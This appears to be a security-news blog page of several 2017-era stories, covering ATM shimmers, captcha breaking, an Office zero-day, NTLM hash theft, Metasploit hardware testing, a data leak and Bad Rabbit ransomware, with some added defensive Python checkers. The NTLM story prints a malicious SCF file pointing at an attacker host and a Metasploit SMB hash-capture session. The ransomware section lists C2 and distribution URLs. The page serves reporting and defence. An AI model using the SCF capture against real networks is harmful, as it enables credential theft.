Saturday, May 3, 2025

Undetectable ATM “Shimmers”: Hackers’ Latest Tool to Steal Your Chip-Based Card Details from POS Terminals

The latest warning comes from Canada, about a sophisticated form of ATM skimming called “shimming” that targets chip-based credit and debit cards and steals the complete card data from POS (point-of-sale) terminals.

Traditional skimming devices record the card data that is stored in plain text on the magnetic stripe on the back of the card.

Last November, a threat to ATMs known as “insert skimmers” was detected: thin data-theft devices made to be completely hidden inside a cash machine’s card acceptance slot.

In this case, a chip-based device called a shimmer is placed inside POS machines, the terminals used in retail stores and other public places for customer payments.

Earlier this year, Const. Alex Bojic of the Coquitlam RCMP economic crime unit published an article saying that shimmers have rendered the bigger and bulkier skimmers virtually obsolete:

“A shimmer, on the other hand, is so named because it acts as a shim that sits between the chip on the card and the chip reader in the ATM — recording the data on the chip as it is read by the ATM.”

They started appearing in Canada earlier this year, and police are now warning ATM and POS (point-of-sale) terminal users around the world to be alert.

Data captured by a shimmer could be used to clone a magnetic stripe card, but it cannot be used to fabricate a chip-based card.

Shimmers work by fitting inside the card reader. Once installed, the microchips on the shimmer record information from chip cards, including the PIN.


What is iCVV?

iCVV stands for integrated circuit card verification value; it is also known as a “dynamic CVV.”

The iCVV differs from the card verification value (CVV) stored on the physical magnetic stripe. This protects against copying magnetic-stripe data from the chip and using that data to create counterfeit magnetic stripe cards.

Some banks have apparently not correctly implemented the chip card standard, known as EMV (short for Europay, Mastercard and Visa), and that is what makes shimming attacks possible.

How this attack can succeed

ATM giant NCR Corp wrote in a 2016 alert: “The only way for this attack to be successful is if a [bank card] issuer neglects to check the CVV when authorizing a transaction.

“All issuers MUST make these basic checks to prevent this category of fraud. Card Shimming is not a vulnerability with a chip card, nor with an ATM, and therefore it is not necessary to add protection mechanisms against this form of attack to the ATM.”
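To make the NCR point concrete, here is an added illustration in Python (not from the article, NCR or any issuer) of an issuer-side authorization check: the magnetic stripe carries the CVV while the chip’s track-2 equivalent carries the iCVV, so a counterfeit stripe written from shimmed chip data presents the wrong value and is declined only when the issuer actually performs the check. The track-2 layout, the placement of the CVV in the last three digits of the discretionary data, the PAN and the CVV/iCVV values are all assumptions constructed for this example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class IssuerRecord:
    """What the issuer holds for one card (constructed values)."""
    pan: str
    expiry: str   # YYMM as encoded on the card
    cvv: str      # value written on the physical magnetic stripe
    icvv: str     # value written in the chip's track-2 equivalent data


def parse_track2(track2):
    """Split a Track 2 (or track-2 equivalent) string into its fields.
    Layout assumed for this example: PAN '=' YYMM service-code
    discretionary-data, with the CVV in the last three digits of the
    discretionary data (real issuers define their own layout)."""
    pan, sep, rest = track2.partition("=")
    if sep != "=" or not pan.isdigit() or not rest.isdigit() or len(rest) < 10:
        raise ValueError("malformed track 2 data")
    return {
        "pan": pan,
        "expiry": rest[0:4],
        "service_code": rest[4:7],
        "cvv": rest[-3:],
    }


def authorize_swipe(track2, issuer_db, check_cvv=True):
    """Issuer-side decision for a magnetic-stripe (swiped) transaction.
    Returns (approved, reason). check_cvv=False models the issuer NCR
    warns about: one that neglects the CVV check."""
    t = parse_track2(track2)
    rec = issuer_db.get(t["pan"])
    if rec is None:
        return False, "unknown card"
    if t["expiry"] != rec.expiry:
        return False, "expiry mismatch"
    if not check_cvv:
        return True, "approved without CVV check"
    if t["cvv"] == rec.cvv:
        return True, "approved"
    if t["cvv"] == rec.icvv:
        # The stripe presented chip data: the classic shimmer clone.
        return False, "iCVV presented on magstripe: cloned from chip data"
    return False, "CVV mismatch"


# Constructed issuer database: one card with distinct CVV and iCVV.
ISSUER_DB = {
    "4111111111111111": IssuerRecord("4111111111111111", "2512", "123", "456"),
}
# Track 2 as read from the genuine magnetic stripe (constructed).
GENUINE_STRIPE = "4111111111111111=25122011000000000123"
# Track 2 written onto a counterfeit stripe from data a shimmer captured
# off the chip: it carries the iCVV, not the CVV (constructed).
SHIMMED_CLONE = "4111111111111111=25122011000000000456"

if __name__ == "__main__":
    print("genuine:", authorize_swipe(GENUINE_STRIPE, ISSUER_DB))
    print("clone, issuer checks CVV:", authorize_swipe(SHIMMED_CLONE, ISSUER_DB))
    print("clone, lazy issuer:", authorize_swipe(SHIMMED_CLONE, ISSUER_DB, check_cvv=False))
```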

The captured information is later extracted when the criminal inserts a special card, also during a purchase or cash withdrawal, which downloads the data. The information is then used to make fake cards.

“You can’t see a shimmer from the outside like the old skimmer version,” Bojic said in a statement. “Businesses and consumers should immediately report anything abnormal about the way their card is acting … especially if the card is sticking inside the machine.”

Using the tap function of a chip card is one way to avoid being “shimmed.” It is actually very secure: each tap transfers very limited banking information, which can’t be used to clone your card.

GoCrack – Password Cracking Tool for Security Professionals to Test Password Effectiveness

Passwords are the basic way we keep our data secure; easy-to-guess passwords and password reuse increase the risk of compromise.

In the 2016 list of most common passwords, nearly 17 percent of people secured their accounts with the password “123456,” according to a survey by Darren Guccione of 10 million passwords collected from data breaches and public sources.

The FireEye team released a password cracking tool, GoCrack, which allows security professionals to manage password cracking tasks across multiple servers through an easy-to-use web interface.


The admin module is deployed on a server, a worker runs on each GPU/CPU-capable machine, and the system automatically distributes tasks over those GPU/CPU machines.


Password cracking tools help security professionals audit current passwords and their effectiveness. They are used in internal auditing as well as in offensive and defensive operations.

“We’re releasing GoCrack to provide another tool for distributed teams to have in their arsenal for managing password cracking and recovery tasks,” said FireEye.

GoCrack allows only administrators to view cracked passwords and to perform other sensitive actions; ordinary users are not privileged for them. It includes support for hashcat v3.6+, and it does not require any external database connection.

It currently supports LDAP and database-backed authentication; in future they plan to add MySQL and Postgres support for large deployments.

GoCrack is available to download from its GitHub repository.

unCaptcha Breaks the reCaptcha System of Defense in 5.42 Seconds

A captcha challenge is a website’s first line of defense against automated attacks: it challenges the visitor to prove that they are a human user.

Google’s reCaptcha was introduced in 2014 and is used by a significant number of sites. It relies on an advanced risk analysis engine and offers both audio and image captchas; here the security researchers attacked the audio captcha.

Security researchers from UM present unCaptcha, a low-resource, fully automated attack on Google’s 2017 reCaptcha audio captcha with a high success rate.

“We have evaluated unCaptcha using over 450 reCaptcha challenges from live websites, and showed that it can solve them with 85.15% accuracy in 5.42 seconds, on average: less time than it takes to even play the audio challenge!” the researchers said.

Attacking captchas normally requires huge resources, and even then the success rate is low. Here the researchers provide a low-resource attack with a high success rate.


How unCaptcha works

It is completely automated: it obtains the audio samples, splits them into segments for analysis of each sound bite, and uploads them to online speech recognition services (IBM, Google Cloud, Google Speech Recognition, Sphinx, Wit-AI, Bing Speech Recognition).


Once the results are collected, it presents the captcha solution. It is also capable of locating the “I’m not a robot” checkbox and clicking it. The researchers have published the unCaptcha code publicly on GitHub.

Last February a researcher discovered a “logic vulnerability,” dubbed ReBreakCaptcha, that allows attackers to automate the process of bypassing reCAPTCHA fields. The source code was published on GitHub.

As mitigations they suggest broadening the vocabulary of sound bites beyond just digits, and adding background noise to make segmentation more difficult.

The full research paper, titled “unCaptcha: A Low-Resource Defeat of reCaptcha’s Audio Challenge,” is available to download here.

All Versions of MS Office Affected by Critical Zero-day Vulnerability That Allows Attackers to Take Full Control of Your System

A critical zero-day remote code execution vulnerability has been discovered in Microsoft Office that could allow an attacker to take complete control of the infected Windows system. The vulnerability affects all versions of Microsoft Office.

The zero-day lies in the Office Open XML parser, where Microsoft Office fails to properly handle objects in memory.

Using this flaw, an attacker could take full control of the victim’s machine by running arbitrary code on the Windows machine where MS Office is installed.

If the targeted user is running with administrative rights, the attacker could take complete control and then install programs; view, change, or delete data; or create new accounts with full user rights.

Sadly, this flaw is present in all Microsoft Office versions running on all the different versions of the Microsoft operating system.


How this MS Office zero-day is exploited

To exploit this MS Office zero-day, the attacker first sends a malicious file to a victim running an affected version of Microsoft Office.

The attacker can send the malicious file by mail and convince the user to open it. Since the attacker cannot force the user to open the file, traditional social engineering methods are used to convince the user.

An example scenario: an exploit RTF document containing a DOCX document that exploits this zero-day vulnerability in the Office Open XML parser.

The exploit itself contains a word/document.xml with a ‘font’ element in the body of the exploit.

According to the ECMA-376 standard for Office Open XML File Formats, a valid ‘font’ element describing the fonts used in the document must look like this:

According to Kaspersky researchers, the exploit document fails to close the tag </w:font>. The opening tag <w:font> is followed by the object element <o:idmap/>, which causes a ‘type confusion’ in the OOXML parser. Any object element can be used to successfully exploit this vulnerability.
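As an added defensive example (not code from the article or from Kaspersky), the following Python scans a word/document.xml for the malformed shape just described: a <w:font> that is never closed and that is directly followed by an element from outside the WordprocessingML namespace, such as <o:idmap/>. It assumes the DOCX has already been pulled out of the RTF container; the two sample documents are constructed fixtures, not real exploit files.

```python
import io
import re
import zipfile

# Crude tag tokenizer for the scan: group 1 is "/" for a closing tag, group 2
# the qualified element name, group 3 is "/" for a self-closing tag. The name
# must start with a letter or underscore, so <?xml ...?> and comments are
# skipped. Deliberately not a real XML parser: a strict parser would simply
# reject the malformed document, while we want to report *why*.
TAG_RE = re.compile(r"<(/?)([A-Za-z_][\w.:-]*)(?:\s[^<>]*?)?(/?)>")


def find_font_anomalies(xml_text):
    """Return a list of findings for <w:font> elements that are left unclosed
    or that directly contain an element from outside the WordprocessingML
    ('w:') namespace, the shape the article describes for CVE-2017-11826."""
    stack = []       # names of currently open elements
    findings = []
    for m in TAG_RE.finditer(xml_text):
        closing, name, selfclose = m.groups()
        if closing:
            if name not in stack:
                continue             # stray closer, ignore
            # Pop until the matching opener; anything popped on the way
            # was never closed.
            while stack[-1] != name:
                if stack.pop() == "w:font":
                    findings.append(f"<w:font> not closed before </{name}>")
            stack.pop()
            continue
        if stack and stack[-1] == "w:font" and not name.startswith("w:"):
            findings.append(f"foreign element <{name}> inside <w:font>")
        if not selfclose:
            stack.append(name)
    findings.extend("<w:font> still open at end of document"
                    for n in stack if n == "w:font")
    return findings


def scan_docx(docx_bytes):
    """Read word/document.xml from a .docx (a zip archive) and scan it."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        xml_text = zf.read("word/document.xml").decode("utf-8", "replace")
    return find_font_anomalies(xml_text)


def build_docx(document_xml):
    """Constructed fixture: a minimal zip holding only word/document.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


NS = ('xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
      'xmlns:o="urn:schemas-microsoft-com:office:office"')

# Constructed samples. GOOD_XML closes <w:font> properly and only holds
# WordprocessingML children; BAD_XML mirrors the article's description:
# <w:font> followed by <o:idmap/> and never closed.
GOOD_XML = (f'<?xml version="1.0"?><w:document {NS}><w:body>'
            '<w:p><w:r><w:t>Hello</w:t></w:r></w:p>'
            '<w:fonts><w:font w:name="Times New Roman">'
            '<w:panose1 w:val="02020603050405020304"/><w:family w:val="roman"/>'
            '</w:font></w:fonts></w:body></w:document>')
BAD_XML = (f'<?xml version="1.0"?><w:document {NS}><w:body>'
           '<w:p><w:r><w:t>Hello</w:t></w:r></w:p>'
           '<w:fonts><w:font w:name="Times New Roman"><o:idmap/>'
           '</w:fonts></w:body></w:document>')

if __name__ == "__main__":
    for label, xml in (("good", GOOD_XML), ("bad", BAD_XML)):
        print(label, scan_docx(build_docx(xml)) or "no anomalies")
```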

The attacker also applies the popular heap spraying technique (a technique used in exploits to facilitate arbitrary code execution), using ActiveX components to control memory layout.

According to Microsoft, the security update addresses the vulnerability by correcting how Microsoft Office handles objects in memory. CVE-2017-11826 has been assigned to this MS Office zero-day vulnerability.

Microsoft patched this flaw in its Patch Tuesday release of 17 October 2017, along with patches for 62 vulnerabilities.

Some of the major affected products

  • Microsoft Office Compatibility Pack Service Pack 3
  • Microsoft Office Online Server 2016
  • Microsoft Office Web Apps Server 2010 Service Pack 2
  • Microsoft Office Web Apps Server 2013 Service Pack 1
  • Microsoft Office Word Viewer
  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft Word 2007 Service Pack 3
  • Microsoft Word 2010 Service Pack 2 (32-bit editions)
  • Microsoft Word 2010 Service Pack 2 (64-bit editions)
  • Microsoft Word 2013 RT Service Pack 1
  • Microsoft Word 2013 Service Pack 1 (32-bit editions)
  • Microsoft Word 2013 Service Pack 1 (64-bit editions)
  • Microsoft Word 2016 (32-bit edition)
  • Microsoft Word 2016 (64-bit edition)
  • Word Automation Services

Detection names for the CVE-2017-11826 exploit

  • MSWord.Agent.ix;
  • MSOffice.CVE-2017-11826.a;
  • HEUR:Exploit.MSOffice.Generic.

IOC Hash – SHA 1

cb3429e608144909ef25df2605c24ec253b10b6e99cbb6657afa6b92e9f32fb5

Get Wi-Fi Hacking with Kali Linux Lifetime Access Course 2017

Today we want to introduce you to the “Wi-Fi Hacking with Kali Linux” course, powered by StackSocial. There is always a huge need for Wi-Fi, not only for using the internet but also for getting into a target network and for keeping your own network secure.

This course aims to teach you Wi-Fi hacking using Kali Linux. After completing it you will be confident with the methods for breaking Wi-Fi and with the mitigations to secure your network.

You can start as a beginner with little or no knowledge of Wi-Fi security and Kali Linux, for just $15 with lifetime access to the content.

Network security is essential to any home or corporate internet connection, which is why ethical hackers are paid big bucks to identify gaps and threats that can take a network down.

In this course, you’ll learn how to protect WEP, WPA, and WPA2 networks using Kali Linux, one of the most popular tools for ethical hackers. By the course’s end, you’ll have the know-how to protect network environments like a pro.

To get the package at the promo price of $15, check here.

Content Information

  • Access 22 lectures of content 24/7
  • Set up a penetration testing environment
  • Learn 4 different ways to install & use Kali Linux
  • Understand how to hack WEP-protected Wi-Fi & learn countermeasures
  • Discover how to hack Wi-Fi using Hydra, a keylogger, or by removing devices

More importantly, the course is valid for a lifetime; it never ends, so you can decide when to start and stop. You have unlimited access across all your devices.

Everything shown in the course is made for educational purposes only. In order to do penetration testing on network, web application, server or other devices(s) you must have written permission by the owner.


iOS Privacy Issue – iPhone Apps Can Secretly Access Your Camera to Take Videos and Pictures

Google security engineer Felix Krause discovered a privacy loophole in the iPhone that can be abused by a malicious iOS app to take videos and pictures of the user secretly.

On an iPhone, once you grant an app permission to access your camera, it can take photos and video without your knowledge, use both the front and back cameras, and even run facial recognition.

Krause found that once you grant an app full access to your iPhone camera, any time the app is brought back to the foreground it runs again with the same permission, even if the permission was revoked.

To demonstrate it, Krause built a social network app that takes pictures and uploads them to the feed without the user’s permission. He also showed that it is possible to detect some basic emotions.

He also suggested some preventive measures for users: the first and best is to cover your camera with a camera cover. The next is to revoke camera access for all apps other than the built-in camera app.

Proposed measures

He suggested that Apple should provide an option to grant temporary access to the camera, and also some ways to alert users when the camera is active:

showing a push notification in the status bar, or a light indicator like the one on a MacBook.

Last September Felix Krause identified a permission issue: any camera app that has access to the image library can extract the user’s locations from the image metadata.

Compared to Android, Apple devices are considered more secure, but nowadays cyberattacks targeting Apple users are on the rise.

Hackers Can Steal Your Windows Login Credentials Without User Interaction Using a New Windows OS Flaw

A newly discovered, dangerous vulnerability in the NTLM architecture allows hackers to steal Windows NTLM password hashes without any user interaction on all recent Windows OS versions.

NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.

This vulnerability allows attackers to steal NTLM hashes remotely, without any user interaction, using a malicious SCF file placed on an unprotected user’s Windows machine.


This vulnerability is a 100% reliable attack vector for users who have an unprotected shared folder without a password. Users whose shared folders are password-protected are safe from this attack, and since Windows protects shared folders by default, most Windows users will be protected.

The worst part is that this is normal behaviour in offices, schools, hospitals and almost all Windows environments: people leave shared folders open for sharing music, photos, and documents.

How hackers steal the NTLM hashes

First, the attacker discovers an unprotected shared folder on the target victim’s machine and drops a malicious SCF (Shell Command File) into it. SCF files execute some basic shell tasks.

Previous SCF file attacks required manual user interaction to execute the SCF file and carry out malicious activity, but this flaw requires no user interaction.

Alternatively, the attacker can use traditional methods such as email to send the malicious SCF file and get it onto the victim’s machine.

The basic SCF file structure contains the shell command, the icon file share and the taskbar information:

[Shell]
Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop

Once the malicious SCF file is in place, the Metasploit SMB capture module is used to collect the NTLM hash from the victim’s machine:

root@sysadminjd:~# cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop
root@sysadminjd:~#
root@sysadminjd:~# msfconsole -q
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job
[*] Server started.
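As an added example from the defender’s side (not part of the article or of the researcher’s write-up), the following Python walks a shared folder, parses each .scf file and flags any whose IconFile points at a UNC host outside a trusted set, which is the artifact this attack leaves on the share. The trusted host name and both sample files are constructed; the benign sample is the layout of the Show Desktop.scf that Windows itself ships.

```python
import configparser
import re
import tempfile
from pathlib import Path

# UNC path: \\host\share\...  (captures the host portion)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text):
    """Parse SCF text (INI syntax) and return the [Shell] IconFile value,
    or None when the section or key is absent."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if not cp.has_section("Shell"):
        return None
    return cp.get("Shell", "IconFile", fallback=None)


def icon_host(text):
    """Return the remote host an SCF's IconFile points to (lower-cased),
    or None when the icon is local (e.g. explorer.exe,3) or missing."""
    icon = parse_scf(text)
    if icon is None:
        return None
    m = UNC_RE.match(icon.strip())
    return m.group(1).lower() if m else None


def classify_scf(text, trusted_hosts):
    """'benign' for local icons or trusted hosts, 'suspicious' otherwise."""
    host = icon_host(text)
    if host is None or host in trusted_hosts:
        return "benign"
    return "suspicious"


def scan_share(root, trusted_hosts):
    """Walk a share directory; return {path: host} for every .scf whose
    IconFile reaches out to a host outside the trusted set (unparseable
    files are reported too, since a real SCF is trivially well-formed)."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() != ".scf" or not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        try:
            if classify_scf(text, trusted_hosts) == "suspicious":
                hits[str(path)] = icon_host(text)
        except configparser.Error:
            hits[str(path)] = "unparseable"
    return hits


# Constructed samples: the attacker-style file from the article and the
# legitimate Show Desktop.scf layout.
MALICIOUS_SCF = ("[Shell]\nCommand=2\nIconFile=\\\\192.168.1.111\\share\\test.ico\n"
                 "[Taskbar]\nCommand=ToggleDesktop\n")
BENIGN_SCF = ("[Shell]\nCommand=2\nIconFile=explorer.exe,3\n"
              "[Taskbar]\nCommand=ToggleDesktop\n")
TRUSTED = {"fileserver.corp.example"}   # constructed allow-list


def demo():
    """Write both samples into a temporary 'share' and scan it; returns
    the flagged file names mapped to the host they point at."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "Show Desktop.scf").write_text(BENIGN_SCF)
        Path(tmp, "music").mkdir()
        Path(tmp, "music", "test.scf").write_text(MALICIOUS_SCF)
        hits = scan_share(tmp, TRUSTED)
        return {Path(p).name: h for p, h in hits.items()}


if __name__ == "__main__":
    print(demo())
```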

Once attackers capture the NTLM hash from the victim’s machine, they use publicly available tools such as John the Ripper to crack the NTLM hashes and recover the Windows login credentials.

The researcher who discovered this vulnerability, Diego, suggested some useful mitigation techniques:

  1. Microsoft created a sort of patch to this vulnerability consisting of changing two registry keys to disable NTLM on the system. These registry keys are available only on Windows 10 and Windows Server 2016, and Microsoft has no intention of backporting them to the other versions.
  2. Another issue is that disabling NTLM will break a lot of environments, and that’s a huge concern for them.
  3. My suggestion is to use strong passwords; after the attack we need to crack the hash, which can take a lot of time if the password is complex, and can be frustrating for the attacker.
  4. The better approach: don’t share folders without passwords; that’ll do the trick.

He reported this vulnerability in May 2017, and Microsoft finally patched it in October 2017.

The patch is only for Windows 10 and Windows Server 2016. Older Windows versions remain vulnerable to this attack because the registry modifications are not compatible with older versions of the Windows Firewall.

Metasploit Can Now Be Used Directly for Hardware Penetration Testing

Security researchers and penetration testers have long used the open source Metasploit Framework to probe for vulnerabilities, run exploits, and simulate real-world attacks against software and networks.

Rapid7 has added a hardware bridge to its Metasploit penetration testing framework, making it easier for users to analyze Internet of Things (IoT) devices.

IoT is growing rapidly, with more than 20 billion Internet of Things (IoT) devices expected by 2020. IoT devices not only create new opportunities for attackers to invade networks and steal information; they can also be hacked to gain access to physical spaces and assets, or even to cause harm to users.

As users become more dependent on the functionality of connected devices, the risk represented by loss of use or corrupted use becomes even greater.

Rapid7 announced the availability of a new Hardware Bridge API for Metasploit that extends the tool’s capabilities into the hardware realm.

Rapid7 researchers said: “The Hardware Bridge API extends Metasploit’s capabilities into the physical world of hardware devices. Much in the same way that the Metasploit framework helped unify tools and exploits for networks and software, the Hardware Bridge looks to do the same for all types of hardware.”


How does it work?

There are two ways to connect a physical device to Metasploit:

  1. Build support directly into your firmware to make your device Metasploit compatible, or
  2. Create a relay service.

A relay service is required if your device does not have a way to naturally communicate on Ethernet. Many useful hardware tools such as Software Defined Radio (SDR) devices are controlled solely through a USB port.

The first release of Metasploit hardware vulnerability testing comes with support for SocketCAN. If you have a Linux system and a CAN bus sniffer that supports SocketCAN, you can get started without anything else.

A CAN bus can then interact directly with the local_hwbridge auxiliary module in Metasploit, which can be used locally or on a remote machine.

Once your hardware device is connected to the system where Metasploit is installed, Metasploit will automatically detect any SocketCAN interfaces. In this simulation it was tested against a vehicle CAN bus.

Next, you connect to a relay or a supported piece of hardware to establish a HWBridge session.

The HWBridge session is established once the relay is connected, and you can then open the session with the CAN buses using Meterpreter.

To connect an SDR device like this to Metasploit, the machine the SDR is connected to would run a relay service. This uses a REST API, the details of which can be found here: Metasploit Hardware Bridge API.

The initial release of the hardware bridge will focus on automotive capabilities, with extensions into other hardware verticals expected throughout the year, and joins a growing library of modules that target embedded, industrial, and hardware devices.

According to the Rapid7, Initial sample modules include capabilities on Controller Area Network (CAN bus), with plans for other bus systems, such as K-Line, to follow. Metasploit also currently includes a number of industrial control exploits for SCADA systems and auxiliary modules.

In addition to helping streamline vulnerability testing, the new capability will enable users to:

  • Conduct comprehensive quality assessments of hardware, supported by Metasploit’s extensive library of exploits
  • Leverage Metasploit as a learning and teaching tool for automotive and exotic hardware-based network research
  • Write exploits that utilize hardware tools without having to worry about vendor specifics
  • Use Metasploit to make automotive diagnostic decisions, removing the burden of low-level packet handling.


Famous Cosmetics Company “Tarte” Leaked 2 Million Customers’ Personal Data Online

New York-based cosmetics company Tarte leaked online the data of around 3 million US and international customers who shopped via its online store between 2008 and 2017, due to poor security settings on its MongoDB server.

Tarte’s server administrators left a security setting as public instead of private, which let anyone access all of their customers’ private data.

The Tarte data leak follows the major breaches at Accenture, Equifax, Deloitte, Forrester, Disqus, Yahoo, the R6DB database, Pizza Hut, Hyatt and Verizon, all reported within a short span of time.

Two misconfigured MongoDB databases, 3.8 GB and 4.9 GB in size, were left open to public access and had been indexed by Shodan.

Apart from this, the data was accessed by the ransomware group “CRU3LTY,” who left their standard ransom note inside the database, demanding 0.2 bitcoin to recover the database after the data had been deleted or encrypted.

According to Kromtech security researchers, cybercriminals have in the past used leaked information to reach out to customers with phishing emails and see who replies. In this instance they would already have the last four digits of the credit card on file, and with 2 million customers they would have all the personal information needed to trick them into believing they are confirming their credit card with a company they trust.

The leaked data contains the following information on around 2 million Tarte customers (the exact number of records is 1,891,928):

  • Customer name
  • Customer address
  • Customer email
  • Purchase history
  • Last 4 digits of credit card

Since hackers have already accessed the customer data, it is possible that criminals could cross-reference it against other breaches and obtain the customer’s full card number or more information.

“On Friday 18th and 19th we have been trying to get in touch with Tarte and sent several security alerts. On Friday 20th all Tarte related databases have been secured, however, with no word from the company,” Kromtech Security said.

Beware: Mass Ransomware Cyber Attack with “Bad Rabbit” Ransomware Hitting Many Government & Private Organizations

A new ransomware family called “Bad Rabbit” is rapidly spreading across Eastern European countries, including Russia, Ukraine, Bulgaria and Turkey, affecting government and private agencies.

Bad Rabbit is a previously unknown ransomware family. It is distributed mostly via drive-by attacks using a fake Adobe Flash Player installer; no exploits are used by this ransomware.

In drive-by attacks, cybercriminals look for insecure websites and plant a malicious script into the HTTP or PHP code of one of the pages. This script may install malware directly onto the computer of someone who visits the site.

Bad Rabbit is spreading rapidly, much like the previous large ransomware families WannaCry, Petya and Locky.

The ransomware dropper is distributed from the fake Adobe Flash Player installer at “hxxp://1dnscontrol[.]com/flash_install.php”; victims are redirected to this malicious web resource from legitimate news websites.

The malicious variant, install_flash_player.exe, has to be installed manually by the victim.

Kaspersky and ESET researchers said: “Our researchers have detected a number of compromised websites, all news or media sites,” the Russian security company, now embroiled in controversy, writes on its blog. “Based on our investigation, this is a targeted attack against corporate networks, using methods similar to those used in the ExPetr attack. However, we cannot confirm it is related to ExPetr.”

Bad Rabbit is also capable of creating scheduled tasks named after dragons: the malware makes references to Daenerys Targaryen’s dragons and Grey Worm.

https://twitter.com/GossiTheDog/status/922859996609736710

Based on analysis by ESET and Emsisoft, Bad Rabbit uses Mimikatz to extract credentials from the local computer’s memory and, along with a list of hard-coded credentials, tries to access servers and workstations on the same network via SMB and WebDAV.

After the victim runs the install_flash_player.exe variant, the computer is locked by Bad Rabbit and shows the following ransom note.

Bad Rabbit Infected Machine

Victims are then asked to pay 0.05 Bitcoin for the decryption key. A countdown timer on the screen shows the payment deadline, counting down to the hour when the price goes up.

Bad Rabbit can encrypt files with the following extensions on the victim’s computer:

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

According to the ESET report, the following countries are the most infected by Bad Rabbit:

  • Russia: 65%
  • Ukraine: 12.2%
  • Bulgaria: 10.2%
  • Turkey: 6.4%
  • Japan: 3.8%
  • Other: 2.4%

“It’s interesting to note that all these big companies were all hit at the same time. It is possible that the group already had a foot inside their network and launched the watering hole attack at the same time as a decoy,” ESET said.

Bad Rabbit ransom note

Oops! Your files have been encrypted.

If you see this text, your files are no longer accessible.
You might have been looking for a way to recover your files.
Don't waste your time. No one will be able to recover them without our
decryption service.

We guarantee that you can recover all your files safely. All you
need to do is submit the payment and get the decryption password.

Visit our web service at caforssztxqzf2nm.onion

Your personal installation key#1:

C&C servers

  • Payment site: http://caforssztxqzf2nm[.]onion
  • Inject URL: http://185.149.120[.]3/scholargoogle/
  • Distribution URL: hxxp://1dnscontrol[.]com/flash_install.php

Embedded RSA-2048 Key:


IOCs:

  • http://1dnscontrol[.]com/
  • fbbdc39af1139aebba4da004475e8839 – install_flash_player.exe
  • 1d724f95c61f1055f0d02c2154bbccd3 – C:\Windows\infpub.dat
  • b14d8faf7f0cbcfad051cefe5f39645f – C:\Windows\dispci.exe